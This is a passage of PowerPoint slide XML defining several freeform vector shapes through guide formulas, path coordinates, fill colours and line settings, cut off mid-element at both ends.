                      <a:pt x="185" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="27"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10688" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1287" y="2563"/>
                <a:ext cx="79" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 79"/>
                  <a:gd name="T1" fmla="*/ 3 h 91"/>
                  <a:gd name="T2" fmla="*/ 78 w 79"/>
                  <a:gd name="T3" fmla="*/ 3 h 91"/>
                  <a:gd name="T4" fmla="*/ 77 w 79"/>
                  <a:gd name="T5" fmla="*/ 3 h 91"/>
                  <a:gd name="T6" fmla="*/ 74 w 79"/>
                  <a:gd name="T7" fmla="*/ 2 h 91"/>
                  <a:gd name="T8" fmla="*/ 72 w 79"/>
                  <a:gd name="T9" fmla="*/ 2 h 91"/>
                  <a:gd name="T10" fmla="*/ 69 w 79"/>
                  <a:gd name="T11" fmla="*/ 1 h 91"/>
                  <a:gd name="T12" fmla="*/ 65 w 79"/>
                  <a:gd name="T13" fmla="*/ 1 h 91"/>
                  <a:gd name="T14" fmla="*/ 60 w 79"/>
                  <a:gd name="T15" fmla="*/ 1 h 91"/>
                  <a:gd name="T16" fmla="*/ 56 w 79"/>
                  <a:gd name="T17" fmla="*/ 0 h 91"/>
                  <a:gd name="T18" fmla="*/ 50 w 79"/>
                  <a:gd name="T19" fmla="*/ 0 h 91"/>
                  <a:gd name="T20" fmla="*/ 44 w 79"/>
                  <a:gd name="T21" fmla="*/ 0 h 91"/>
                  <a:gd name="T22" fmla="*/ 38 w 79"/>
                  <a:gd name="T23" fmla="*/ 1 h 91"/>
                  <a:gd name="T24" fmla="*/ 31 w 79"/>
                  <a:gd name="T25" fmla="*/ 2 h 91"/>
                  <a:gd name="T26" fmla="*/ 25 w 79"/>
                  <a:gd name="T27" fmla="*/ 3 h 91"/>
                  <a:gd name="T28" fmla="*/ 18 w 79"/>
                  <a:gd name="T29" fmla="*/ 6 h 91"/>
                  <a:gd name="T30" fmla="*/ 11 w 79"/>
                  <a:gd name="T31" fmla="*/ 8 h 91"/>
                  <a:gd name="T32" fmla="*/ 4 w 79"/>
                  <a:gd name="T33" fmla="*/ 10 h 91"/>
                  <a:gd name="T34" fmla="*/ 4 w 79"/>
                  <a:gd name="T35" fmla="*/ 13 h 91"/>
                  <a:gd name="T36" fmla="*/ 3 w 79"/>
                  <a:gd name="T37" fmla="*/ 17 h 91"/>
                  <a:gd name="T38" fmla="*/ 1 w 79"/>
                  <a:gd name="T39" fmla="*/ 26 h 91"/>
                  <a:gd name="T40" fmla="*/ 0 w 79"/>
                  <a:gd name="T41" fmla="*/ 35 h 91"/>
                  <a:gd name="T42" fmla="*/ 0 w 79"/>
                  <a:gd name="T43" fmla="*/ 47 h 91"/>
                  <a:gd name="T44" fmla="*/ 0 w 79"/>
                  <a:gd name="T45" fmla="*/ 59 h 91"/>
                  <a:gd name="T46" fmla="*/ 2 w 79"/>
                  <a:gd name="T47" fmla="*/ 73 h 91"/>
                  <a:gd name="T48" fmla="*/ 6 w 79"/>
                  <a:gd name="T49" fmla="*/ 89 h 91"/>
                  <a:gd name="T50" fmla="*/ 7 w 79"/>
                  <a:gd name="T51" fmla="*/ 89 h 91"/>
                  <a:gd name="T52" fmla="*/ 8 w 79"/>
                  <a:gd name="T53" fmla="*/ 89 h 91"/>
                  <a:gd name="T54" fmla="*/ 9 w 79"/>
                  <a:gd name="T55" fmla="*/ 87 h 91"/>
                  <a:gd name="T56" fmla="*/ 11 w 79"/>
                  <a:gd name="T57" fmla="*/ 87 h 91"/>
                  <a:gd name="T58" fmla="*/ 15 w 79"/>
                  <a:gd name="T59" fmla="*/ 87 h 91"/>
                  <a:gd name="T60" fmla="*/ 18 w 79"/>
                  <a:gd name="T61" fmla="*/ 87 h 91"/>
                  <a:gd name="T62" fmla="*/ 22 w 79"/>
                  <a:gd name="T63" fmla="*/ 87 h 91"/>
                  <a:gd name="T64" fmla="*/ 27 w 79"/>
                  <a:gd name="T65" fmla="*/ 87 h 91"/>
                  <a:gd name="T66" fmla="*/ 32 w 79"/>
                  <a:gd name="T67" fmla="*/ 86 h 91"/>
                  <a:gd name="T68" fmla="*/ 38 w 79"/>
                  <a:gd name="T69" fmla="*/ 87 h 91"/>
                  <a:gd name="T70" fmla="*/ 44 w 79"/>
                  <a:gd name="T71" fmla="*/ 87 h 91"/>
                  <a:gd name="T72" fmla="*/ 50 w 79"/>
                  <a:gd name="T73" fmla="*/ 87 h 91"/>
                  <a:gd name="T74" fmla="*/ 57 w 79"/>
                  <a:gd name="T75" fmla="*/ 87 h 91"/>
                  <a:gd name="T76" fmla="*/ 64 w 79"/>
                  <a:gd name="T77" fmla="*/ 89 h 91"/>
                  <a:gd name="T78" fmla="*/ 71 w 79"/>
                  <a:gd name="T79" fmla="*/ 90 h 91"/>
                  <a:gd name="T80" fmla="*/ 79 w 79"/>
                  <a:gd name="T81" fmla="*/ 91 h 91"/>
                  <a:gd name="T82" fmla="*/ 79 w 79"/>
                  <a:gd name="T83" fmla="*/ 87 h 91"/>
                  <a:gd name="T84" fmla="*/ 78 w 79"/>
                  <a:gd name="T85" fmla="*/ 80 h 91"/>
                  <a:gd name="T86" fmla="*/ 77 w 79"/>
                  <a:gd name="T87" fmla="*/ 70 h 91"/>
                  <a:gd name="T88" fmla="*/ 76 w 79"/>
                  <a:gd name="T89" fmla="*/ 57 h 91"/>
                  <a:gd name="T90" fmla="*/ 76 w 79"/>
                  <a:gd name="T91" fmla="*/ 43 h 91"/>
                  <a:gd name="T92" fmla="*/ 76 w 79"/>
                  <a:gd name="T93" fmla="*/ 28 h 91"/>
                  <a:gd name="T94" fmla="*/ 77 w 79"/>
                  <a:gd name="T95" fmla="*/ 15 h 91"/>
                  <a:gd name="T96" fmla="*/ 78 w 79"/>
                  <a:gd name="T97" fmla="*/ 3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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 91"/>
                  <a:gd name="T149" fmla="*/ 79 w 79"/>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9" h="91">
                    <a:moveTo>
                      <a:pt x="78" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10689" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1295" y="2587"/>
                <a:ext cx="132" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 132"/>
                  <a:gd name="T1" fmla="*/ 68 h 90"/>
                  <a:gd name="T2" fmla="*/ 0 w 132"/>
                  <a:gd name="T3" fmla="*/ 80 h 90"/>
                  <a:gd name="T4" fmla="*/ 86 w 132"/>
                  <a:gd name="T5" fmla="*/ 90 h 90"/>
                  <a:gd name="T6" fmla="*/ 86 w 132"/>
                  <a:gd name="T7" fmla="*/ 90 h 90"/>
                  <a:gd name="T8" fmla="*/ 89 w 132"/>
                  <a:gd name="T9" fmla="*/ 89 h 90"/>
                  <a:gd name="T10" fmla="*/ 91 w 132"/>
                  <a:gd name="T11" fmla="*/ 88 h 90"/>
                  <a:gd name="T12" fmla="*/ 94 w 132"/>
                  <a:gd name="T13" fmla="*/ 86 h 90"/>
                  <a:gd name="T14" fmla="*/ 98 w 132"/>
                  <a:gd name="T15" fmla="*/ 83 h 90"/>
                  <a:gd name="T16" fmla="*/ 103 w 132"/>
                  <a:gd name="T17" fmla="*/ 80 h 90"/>
                  <a:gd name="T18" fmla="*/ 107 w 132"/>
                  <a:gd name="T19" fmla="*/ 76 h 90"/>
                  <a:gd name="T20" fmla="*/ 112 w 132"/>
                  <a:gd name="T21" fmla="*/ 72 h 90"/>
                  <a:gd name="T22" fmla="*/ 117 w 132"/>
                  <a:gd name="T23" fmla="*/ 67 h 90"/>
                  <a:gd name="T24" fmla="*/ 121 w 132"/>
                  <a:gd name="T25" fmla="*/ 61 h 90"/>
                  <a:gd name="T26" fmla="*/ 125 w 132"/>
                  <a:gd name="T27" fmla="*/ 55 h 90"/>
                  <a:gd name="T28" fmla="*/ 128 w 132"/>
                  <a:gd name="T29" fmla="*/ 48 h 90"/>
                  <a:gd name="T30" fmla="*/ 131 w 132"/>
                  <a:gd name="T31" fmla="*/ 40 h 90"/>
                  <a:gd name="T32" fmla="*/ 132 w 132"/>
                  <a:gd name="T33" fmla="*/ 32 h 90"/>
                  <a:gd name="T34" fmla="*/ 132 w 132"/>
                  <a:gd name="T35" fmla="*/ 24 h 90"/>
                  <a:gd name="T36" fmla="*/ 129 w 132"/>
                  <a:gd name="T37" fmla="*/ 14 h 90"/>
                  <a:gd name="T38" fmla="*/ 129 w 132"/>
                  <a:gd name="T39" fmla="*/ 13 h 90"/>
                  <a:gd name="T40" fmla="*/ 128 w 132"/>
                  <a:gd name="T41" fmla="*/ 12 h 90"/>
                  <a:gd name="T42" fmla="*/ 127 w 132"/>
                  <a:gd name="T43" fmla="*/ 10 h 90"/>
                  <a:gd name="T44" fmla="*/ 126 w 132"/>
                  <a:gd name="T45" fmla="*/ 7 h 90"/>
                  <a:gd name="T46" fmla="*/ 124 w 132"/>
                  <a:gd name="T47" fmla="*/ 5 h 90"/>
                  <a:gd name="T48" fmla="*/ 120 w 132"/>
                  <a:gd name="T49" fmla="*/ 3 h 90"/>
                  <a:gd name="T50" fmla="*/ 117 w 132"/>
                  <a:gd name="T51" fmla="*/ 2 h 90"/>
                  <a:gd name="T52" fmla="*/ 113 w 132"/>
                  <a:gd name="T53" fmla="*/ 0 h 90"/>
                  <a:gd name="T54" fmla="*/ 113 w 132"/>
                  <a:gd name="T55" fmla="*/ 3 h 90"/>
                  <a:gd name="T56" fmla="*/ 114 w 132"/>
                  <a:gd name="T57" fmla="*/ 6 h 90"/>
                  <a:gd name="T58" fmla="*/ 117 w 132"/>
                  <a:gd name="T59" fmla="*/ 12 h 90"/>
                  <a:gd name="T60" fmla="*/ 118 w 132"/>
                  <a:gd name="T61" fmla="*/ 20 h 90"/>
                  <a:gd name="T62" fmla="*/ 118 w 132"/>
                  <a:gd name="T63" fmla="*/ 30 h 90"/>
                  <a:gd name="T64" fmla="*/ 117 w 132"/>
                  <a:gd name="T65" fmla="*/ 40 h 90"/>
                  <a:gd name="T66" fmla="*/ 114 w 132"/>
                  <a:gd name="T67" fmla="*/ 52 h 90"/>
                  <a:gd name="T68" fmla="*/ 108 w 132"/>
                  <a:gd name="T69" fmla="*/ 65 h 90"/>
                  <a:gd name="T70" fmla="*/ 108 w 132"/>
                  <a:gd name="T71" fmla="*/ 65 h 90"/>
                  <a:gd name="T72" fmla="*/ 108 w 132"/>
                  <a:gd name="T73" fmla="*/ 65 h 90"/>
                  <a:gd name="T74" fmla="*/ 107 w 132"/>
                  <a:gd name="T75" fmla="*/ 66 h 90"/>
                  <a:gd name="T76" fmla="*/ 106 w 132"/>
                  <a:gd name="T77" fmla="*/ 67 h 90"/>
                  <a:gd name="T78" fmla="*/ 105 w 132"/>
                  <a:gd name="T79" fmla="*/ 67 h 90"/>
                  <a:gd name="T80" fmla="*/ 103 w 132"/>
                  <a:gd name="T81" fmla="*/ 68 h 90"/>
                  <a:gd name="T82" fmla="*/ 100 w 132"/>
                  <a:gd name="T83" fmla="*/ 69 h 90"/>
                  <a:gd name="T84" fmla="*/ 98 w 132"/>
                  <a:gd name="T85" fmla="*/ 70 h 90"/>
                  <a:gd name="T86" fmla="*/ 96 w 132"/>
                  <a:gd name="T87" fmla="*/ 72 h 90"/>
                  <a:gd name="T88" fmla="*/ 92 w 132"/>
                  <a:gd name="T89" fmla="*/ 73 h 90"/>
                  <a:gd name="T90" fmla="*/ 90 w 132"/>
                  <a:gd name="T91" fmla="*/ 73 h 90"/>
                  <a:gd name="T92" fmla="*/ 85 w 132"/>
                  <a:gd name="T93" fmla="*/ 74 h 90"/>
                  <a:gd name="T94" fmla="*/ 82 w 132"/>
                  <a:gd name="T95" fmla="*/ 74 h 90"/>
                  <a:gd name="T96" fmla="*/ 78 w 132"/>
                  <a:gd name="T97" fmla="*/ 74 h 90"/>
                  <a:gd name="T98" fmla="*/ 73 w 132"/>
                  <a:gd name="T99" fmla="*/ 73 h 90"/>
                  <a:gd name="T100" fmla="*/ 69 w 132"/>
                  <a:gd name="T101" fmla="*/ 73 h 90"/>
                  <a:gd name="T102" fmla="*/ 69 w 132"/>
                  <a:gd name="T103" fmla="*/ 84 h 90"/>
                  <a:gd name="T104" fmla="*/ 3 w 132"/>
                  <a:gd name="T105" fmla="*/ 77 h 90"/>
                  <a:gd name="T106" fmla="*/ 1 w 132"/>
                  <a:gd name="T107" fmla="*/ 68 h 9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2"/>
                  <a:gd name="T163" fmla="*/ 0 h 90"/>
                  <a:gd name="T164" fmla="*/ 132 w 132"/>
                  <a:gd name="T165" fmla="*/ 90 h 9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2" h="90">
                    <a:moveTo>
                      <a:pt x="1" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="68"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10690" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1279" y="2676"/>
                <a:ext cx="96" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 96 w 96"/>
                  <a:gd name="T1" fmla="*/ 12 h 32"/>
                  <a:gd name="T2" fmla="*/ 1 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 96"/>
                  <a:gd name="T5" fmla="*/ 12 h 32"/>
                  <a:gd name="T6" fmla="*/ 93 w 96"/>
                  <a:gd name="T7" fmla="*/ 32 h 32"/>
                  <a:gd name="T8" fmla="*/ 96 w 96"/>
                  <a:gd name="T9" fmla="*/ 12 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 96"/>
                  <a:gd name="T16" fmla="*/ 0 h 32"/>
                  <a:gd name="T17" fmla="*/ 96 w 96"/>
                  <a:gd name="T18" fmla="*/ 32 h 32"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="96" h="32">
                    <a:moveTo>
                      <a:pt x="96" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="12"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10691" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1326" y="2687"/>
                <a:ext cx="42" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 42"/>
                  <a:gd name="T1" fmla="*/ 6 h 14"/>
                  <a:gd name="T2" fmla="*/ 2 w 42"/>
                  <a:gd name="T3" fmla="*/ 0 h 14"/>
                  <a:gd name="T4" fmla="*/ 0 w 42"/>
                  <a:gd name="T5" fmla="*/ 6 h 14"/>
                  <a:gd name="T6" fmla="*/ 40 w 42"/>
                  <a:gd name="T7" fmla="*/ 14 h 14"/>
                  <a:gd name="T8" fmla="*/ 42 w 42"/>
                  <a:gd name="T9" fmla="*/ 6 h 14"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
